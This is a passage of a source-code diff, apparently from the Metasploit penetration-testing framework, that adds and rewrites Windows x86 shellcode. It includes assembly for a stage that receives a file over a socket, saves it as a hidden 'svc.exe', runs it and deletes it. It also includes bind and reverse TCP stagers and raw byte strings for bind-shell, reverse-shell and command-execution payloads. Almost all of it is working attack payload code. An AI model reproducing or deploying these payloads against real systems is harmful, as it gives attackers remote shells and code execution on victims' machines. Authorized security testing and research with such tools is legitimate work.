'api_call' from stage 1. +; We reset EBP to the address of 'api_call' as found in this blob to avoid any problems +; if the old stage 1 location gets munged. + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +%include "./src/block/block_api.asm" +start: ; + pop ebp ; Pop off the address of 'api_call' for calling later. +%include "./src/block/block_shell.asm" + ; Perform the call to our EXITFUNC. +%include "./src/block/block_exitfunk.asm" \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/stage/stage_upexec.asm b/external/source/shellcode/windows/x86/src/stage/stage_upexec.asm new file mode 100644 index 0000000000..a9fb49a1ff --- /dev/null +++ b/external/source/shellcode/windows/x86/src/stage/stage_upexec.asm @@ -0,0 +1,137 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (28 July 2009) +; Size: 398 bytes +; Build: >build.py stage_upexec +;-----------------------------------------------------------------------------; +[BITS 32] +[ORG 0] + +; By here EDI will be our socket and EBP will be the address of 'api_call' from stage 1. +; We reset EBP to the address of 'api_call' as found in this blob to avoid any problems +; if the old stage 1 location gets munged. + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +delta: ; +%include "./src/block/block_api.asm" +start: ; + pop ebp ; Pop off the address of 'api_call' for calling later. + ; create a file in a temp dir... + push byte 127 ; Push down 127 + pop eax ; And pop it into EAX + shl eax, 3 ; Shift EAX left by 3 so it = 1016 + sub esp, eax ; Alloc this space on the stack for the temp file path + name + push esp ; Push the buffer address + push eax ; Push the buffer size (127 * 4 = 508) + push 0xE449F330 ; hash( "kernel32.dll", "GetTempPathA" ) + call ebp ; GetTempPathA( 1016, &buffer ); + lea eax, [esp+eax] ; EAX = pointer to the end of the temp path buffer (ESP point to the full path) + mov dword [eax+0], 0x2E637673 ; Append the file name... + mov dword [eax+4], 0x00657865 ; 'svc.exe',0 + ; Create the file... + mov eax, esp ; to save a few bytes, pace the file path pointer in EAX + push eax ; save the pointer to the file path for later + push byte 0 ; We dont specify a template file handle + push byte 6 ; The Flags and Attributes: FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM + push byte 2 ; The Creation Disposition: CREATE_ALWAYS + push byte 0 ; We dont specify a SECURITY_ATTRIBUTES structure + push byte 7 ; The Share Mode: FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE + push 0xE0000000 ; The Desired Access: GENERIC_EXECUTE|GENERIC_READ|GENERIC_WRITE + push eax ; The name of the file to create + push 0x4FDAF6DA ; hash( "kernel32.dll", "CreateFileA" ) + call ebp ; CreateFileA( ... ); + mov ebx, eax ; EBX = the new file handle + ; Receive the size of the incoming file... + push esp ; Alloc a dword for the recv buffer param + mov esi, esp ; Save pointer + push byte 0 ; Flags + push byte 4 ; Length = sizeof( DWORD ); + push esi ; The 4 byte buffer on the stack to hold the second stage length + push edi ; The saved socket + push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" ) + call ebp ; recv( s, &dwLength, 4, 0 ); + ; Alloc a RW buffer for the incoming file... + mov esi, [esi] ; Dereference the pointer to the second stage length + push byte 0x04 ; PAGE_READWRITE + push 0x1000 ; MEM_COMMIT + push esi ; Push the newly recieved second stage length. + push byte 0 ; NULL as we dont care where the allocation is. + push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) + call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_READWRITE ); + push ebx ; Save the file handle for later call to CloseHandle + ; setup the parameters for subsequent call to WriteFile (saves us trying to preserve various registers) + push ebx ; Alloc a dword for the bytes written param + mov ecx, esp ; Save this address + push byte 0 ; null as we dont set an overlapped param + push ecx ; Pointer to the number of bytes written output param + push esi ; Push the buffer length + push eax ; Push the newly allocated RW buffer + push ebx ; Push the hFile param + mov ebx, eax ; EBX = our new memory address for the incoming file + ; read in the incoming file... +read_more: ; + push byte 0 ; Flags + push esi ; Length + push ebx ; The current address into our incoming files RW buffer + push edi ; The saved socket + push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" ) + call ebp ; recv( s, buffer, length, 0 ); + add ebx, eax ; buffer += bytes_received + sub esi, eax ; length -= bytes_received + test esi, esi ; Test length + jnz read_more ; Continue if we have more to read + ; write the entire files buffer to disk... + push 0x5BAE572D ; hash( "kernel32.dll", "WriteFile" ) + call ebp ; WriteFile( hFile, pBuffer, len, &out, 0 ); + pop ecx ; Restore esp to the correct location for the next call + ; close the file handle, we dont need to push the handle as it is allready pushed onto stack + push 0x528796C6 ; hash( "kernel32.dll", "CloseHandle" ) + call ebp ; CloseHandle( hFile ); + ; execute the file... + push edi ; Our socket becomes the processes hStdError + push edi ; Our socket becomes the processes hStdOutput + push edi ; Our socket becomes the processes hStdInput + xor esi, esi ; Clear ESI for all the NULL's we need to push + push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack + pop ecx ; Set ECX for the loop +push_loop2: ; + push esi ; Push a null dword + loop push_loop2 ; Keep looping untill we have pushed enough nulls + mov word [esp+60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW + lea eax, [esp+16] ; Set EAX as a pointer to our STARTUPINFO Structure + mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure + ; perform the call to CreateProcessA + push esp ; Push the pointer to the PROCESS_INFORMATION Structure + push eax ; Push the pointer to the STARTUPINFO Structure + push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent + push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent + push esi ; We dont specify any dwCreationFlags + inc esi ; Increment ESI to be one + push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent + dec esi ; Decrement ESI back down to zero + push esi ; Set lpThreadAttributes to NULL + push esi ; Set lpProcessAttributes to NULL + push dword [esp+120] ; Set the lpCommandLine to run the file (Use the saved pointer to the file path) + push esi ; Set lpApplicationName to NULL as we are using the command line param instead + push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" ) + call ebp ; CreateProcessA( 0, &file, 0, 0, TRUE, 0, 0, 0, &si, &pi ); + ; perform the call to WaitForSingleObject + mov eax, esp ; Save pointer to the PROCESS_INFORMATION Structure + dec esi ; Decrement ESI down to -1 (INFINITE) + push esi ; Push INFINITE inorder to wait forever + inc esi ; Increment ESI back to zero + push dword [eax] ; Push the handle from our PROCESS_INFORMATION.hProcess + push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" ) + call ebp ; WaitForSingleObject( pi.hProcess, INFINITE ); + ; close the socket... + push edi ; Push the socket to close + push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" ) + call ebp ; closesocket( s ); + ; delete the file... + push dword [esp+88] ; Push the saved pointer to the file path + push 0x13DD2ED7 ; hash( "kernel32.dll", "DeleteFileA" ) + call ebp ; DeleteFileA( &file ); + ; finish up with the EXITFUNK +%include "./src/block/block_exitfunk.asm" diff --git a/external/source/shellcode/windows/x86/src/stager/stager_bind_tcp_nx.asm b/external/source/shellcode/windows/x86/src/stager/stager_bind_tcp_nx.asm new file mode 100644 index 0000000000..986cc25eb7 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/stager/stager_bind_tcp_nx.asm @@ -0,0 +1,19 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (24 July 2009) +; Size: 301 bytes +; Build: >build.py stager_bind_tcp_nx +;-----------------------------------------------------------------------------; +[BITS 32] +[ORG 0] + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +%include "./src/block/block_api.asm" +start: ; + pop ebp ; pop off the address of 'api_call' for calling later. +%include "./src/block/block_bind_tcp.asm" + ; By here we will have performed the bind_tcp connection and EDI will be our socket. +%include "./src/block/block_recv.asm" + ; By now we will have recieved in the second stage into a RWX buffer and be executing it \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm b/external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm new file mode 100644 index 0000000000..e7960d9110 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm @@ -0,0 +1,20 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (24 July 2009) +; Size: 274 bytes +; Build: >build.py stager_reverse_tcp_nx +;-----------------------------------------------------------------------------; + +[BITS 32] +[ORG 0] + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +%include "./src/block/block_api.asm" +start: ; + pop ebp ; pop off the address of 'api_call' for calling later. +%include "./src/block/block_reverse_tcp.asm" + ; By here we will have performed the reverse_tcp connection and EDI will be our socket. +%include "./src/block/block_recv.asm" + ; By now we will have recieved in the second stage into a RWX buffer and be executing it \ No newline at end of file diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb index 3255feb594..99ac717919 100644 --- a/lib/msf/core/payload/windows.rb +++ b/lib/msf/core/payload/windows.rb @@ -15,9 +15,9 @@ module Msf::Payload::Windows # @@exit_types = { - 'seh' => 0x5f048af0, # SetUnhandledExceptionFilter - 'thread' => 0x60e0ceef, # ExitThread - 'process' => 0x73e2d87e, # ExitProcess + 'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter + 'thread' => 0x0A2A1DE0, # ExitThread + 'process' => 0x56A2B5F0, # ExitProcess } # @@ -64,6 +64,13 @@ module Msf::Payload::Windows # ensure that the entire stage is read in. # def handle_intermediate_stage(conn, payload) + + if( self.module_info['Stager']['RequiresMidstager'] == false ) + conn.put( [ payload.length ].pack('V') ) + # returning false allows stager.rb!handle_connection() to prepend the stage_prefix if needed + return false + end + return false if (payload.length < 512) # The mid-stage works by reading in a four byte length in host-byte diff --git a/lib/msf/core/payload/windows/exec.rb b/lib/msf/core/payload/windows/exec.rb index 2911214dff..287243bcbb 100644 --- a/lib/msf/core/payload/windows/exec.rb +++ b/lib/msf/core/payload/windows/exec.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + module Msf ### @@ -5,6 +9,7 @@ module Msf # Common command execution implementation for Windows. # ### + module Payload::Windows::Exec include Msf::Payload::Windows @@ -15,7 +20,7 @@ module Payload::Windows::Exec 'Name' => 'Windows Execute Command', 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command', - 'Author' => 'vlad902', + 'Author' => [ 'vlad902', 'Stephen Fewer ' ], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X86, @@ -23,16 +28,20 @@ module Payload::Windows::Exec { 'Offsets' => { - 'EXITFUNC' => [ 100, 'V' ] + 'EXITFUNC' => [ 161, 'V' ] }, - 'Payload' => - "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" + - "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" + - "\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" + - "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" + - "\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64" + - "\x8b\x46\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83" + - "\xc0\x6a\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff\xe7" + 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x6A\x01\x8D\x85\xB9\x00\x00\x00\x50\x68\x31\x8B\x6F\x87\xFF\xD5" + + "\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A" + + "\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5" } )) diff --git a/lib/msf/core/payload/windows/reflectivedllinject.rb b/lib/msf/core/payload/windows/reflectivedllinject.rb index bad8a5c43f..623bf032f1 100644 --- a/lib/msf/core/payload/windows/reflectivedllinject.rb +++ b/lib/msf/core/payload/windows/reflectivedllinject.rb @@ -82,7 +82,7 @@ module Payload::Windows::ReflectiveDllInject "\x68\x04\x00\x00\x00" + # push 0x4 ; signal we have attached "\x50" + # push eax ; some value for hinstance "\xFF\xD0" + # call eax ; call DllMain( somevalue, DLL_METASPLOIT_ATTACH, socket ) - "\x68\xDE\xC0\xAD\xDE" + # push 0xDEADC0DE ; our EXITFUNC placeholder + "\x68\xE0\x1D\x2A\x0A" + # push 0x0A2A1DE0 ; our EXITFUNC placeholder (Default to ExitThread for migration) "\x68\x05\x00\x00\x00" + # push 0x5 ; signal we have detached "\x50" + # push eax ; some value for hinstance "\xFF\xD3" # call ebx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk ) diff --git a/modules/payloads/singles/windows/shell_bind_tcp.rb b/modules/payloads/singles/windows/shell_bind_tcp.rb index d7f8755e1d..3c03fbca49 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp.rb @@ -24,7 +24,7 @@ module Metasploit3 'Name' => 'Windows Command Shell, Bind TCP Inline', 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', - 'Author' => 'vlad902', + 'Author' => [ 'vlad902', 'Stephen Fewer ' ], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X86, @@ -34,38 +34,31 @@ module Metasploit3 { 'Offsets' => { - 'LPORT' => [ 162, 'n' ], - 'EXITFUNC' => [ 308, 'V' ], + 'LPORT' => [ 201, 'n' ], + 'EXITFUNC' => [ 311, 'V' ], }, - 'Payload' => - "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" + - "\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" + - "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" + - "\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" + - "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" + - "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" + - "\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" + - "\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" + - "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" + - "\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" + - "\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" + - "\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" + - "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53" + - "\x43\x53\xff\xd0\x66\x68\x11\x5c\x66\x53\x89\xe1" + - "\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51" + - "\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" + - "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50" + - "\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57" + - "\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d" + - "\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" + - "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93" + - "\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff" + - "\x75\x44\xff\xd6\x5b\x57\x52\x51\x51\x51\x6a\x01" + - "\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" + - "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83" + - "\xc4\x64\xff\xd6\x52\xff\xd0\x68\x7e\xd8\xe2\x73" + - "\x53\xff\xd6\xff\xd0" - + 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" + + "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" + + "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" + + "\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" + + "\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" + + "\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" + + "\x6E\x4D\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31" + + "\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44" + + "\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53" + + "\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68" + + "\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D" + + "\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F" + + "\x6A\x00\x53\xFF\xD5" } )) end diff --git a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb index a2a2ba3bdc..49aab20fc3 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb @@ -77,5 +77,18 @@ module Metasploit3 } )) end - + + # for now we must let this payload use the old EXITFUNC hash values. + def replace_var(raw, name, offset, pack) + super + if( name == 'EXITFUNC' ) + datastore[name] = 'thread' if not datastore[name] + raw[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore[name] == 'seh' + raw[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore[name] == 'thread' + raw[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore[name] == 'process' + return true + end + return false + end + end \ No newline at end of file diff --git a/modules/payloads/singles/windows/shell_reverse_tcp.rb b/modules/payloads/singles/windows/shell_reverse_tcp.rb index 2f09d29f77..dc14a405eb 100644 --- a/modules/payloads/singles/windows/shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/shell_reverse_tcp.rb @@ -24,7 +24,7 @@ module Metasploit3 'Name' => 'Windows Command Shell, Reverse TCP Inline', 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', - 'Author' => 'vlad902', + 'Author' => [ 'vlad902', 'Stephen Fewer ' ], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X86, @@ -34,36 +34,30 @@ module Metasploit3 { 'Offsets' => { - 'LPORT' => [ 166, 'n' ], - 'LHOST' => [ 160, 'ADDR' ], - 'EXITFUNC' => [ 278, 'V' ], + 'LPORT' => [ 203, 'n' ], + 'LHOST' => [ 196, 'ADDR' ], + 'EXITFUNC' => [ 284, 'V' ], }, - 'Payload' => - "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" + - "\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" + - "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" + - "\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" + - "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" + - "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" + - "\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" + - "\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" + - "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" + - "\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" + - "\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" + - "\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" + - "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43" + - "\x53\xff\xd0\x68\xff\xff\xff\xff\x66\x68\x11\x5c" + - "\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff" + - "\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68" + - "\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" + - "\xe2\x31\xc0\xf3\xaa\x95\x89\xfd\xfe\x42\x2d\xfe" + - "\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3" + - "\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" + - "\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" + - "\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7" + - "\x79\xc6\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff" + - "\xd0\x68\x7e\xd8\xe2\x73\x53\xff\xd6\xff\xd0" - + 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" + + "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" + + "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" + + "\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" + + "\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89" + + "\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24" + + "\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46" + + "\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E" + + "\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A" + + "\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05" + + "\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5" } )) end diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index deda01d04a..a077f17377 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -24,7 +24,7 @@ module Metasploit3 'Name' => 'Bind TCP Stager', 'Version' => '$Revision$', 'Description' => 'Listen for a connection', - 'Author' => ['hdm', 'skape'], + 'Author' => ['hdm', 'skape', 'Stephen Fewer '], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X86, @@ -32,34 +32,27 @@ module Metasploit3 'Convention' => 'sockedi', 'Stager' => { - 'Offsets' => - { - 'LPORT' => [ 276+1, 'n' ], - }, - 'Payload' => - "\xfc"+ - "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" + - "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" + - "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" + - "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" + - "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" + - "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b\x52" + - "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff\x31" + - "\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81" + - "\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68\x8e" + - "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" + - "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00" + - "\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49\x86\x49" + - "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" + - "\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf" + - "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04" + - "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0" + - "\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53" + - "\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53" + - "\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7\xff\x55" + - "\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff" + - "\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18" + - "\xff\xd3" + 'Offsets' => { 'LPORT' => [ 201, 'n' ] }, + 'RequiresMidstager' => false, + 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + 